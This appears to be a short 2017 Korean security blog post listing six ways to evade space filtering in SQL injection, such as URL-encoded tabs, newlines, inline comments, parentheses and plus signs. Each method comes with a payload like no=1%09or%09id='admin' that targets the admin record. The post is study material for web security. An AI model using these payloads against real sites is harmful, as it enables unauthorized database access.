본문 바로가기
C. 웹/개념

[WEB] SQL injection 공백 우회

by E-HO 2017. 8. 3.
728x90

공백(WHITE SPACE) 우회



1. Tab : %09

  - no=1%09or%09id='admin'


2. Line Feed (\n): %0a

  - no=1%0aor%0aid='admin'

 

3. Carrage Return(\r) : %0d

  - no=1%0dor%0did='admin'


4. 주석 : /**/

  - no=1/**/or/**/id='admin'


5. 괄호 : ()

  - no=(1)or(id='admin')


6. 더하기 : +

  - no=1+or+id='admin'


반응형

'C. 웹 > 개념' 카테고리의 다른 글

[WEB] SQL Injection 싱글 쿼터 우회  (0) 2017.08.03
[WEB] MYSQL delete, drop, truncate의 차이  (0) 2017.07.24
[WEB] MYSQL 수정,삭제 쿼리  (1) 2017.07.24
[WEB] MYSQL 기본 쿼리  (0) 2017.07.08
[WEB] APM 연동과정  (0) 2017.07.07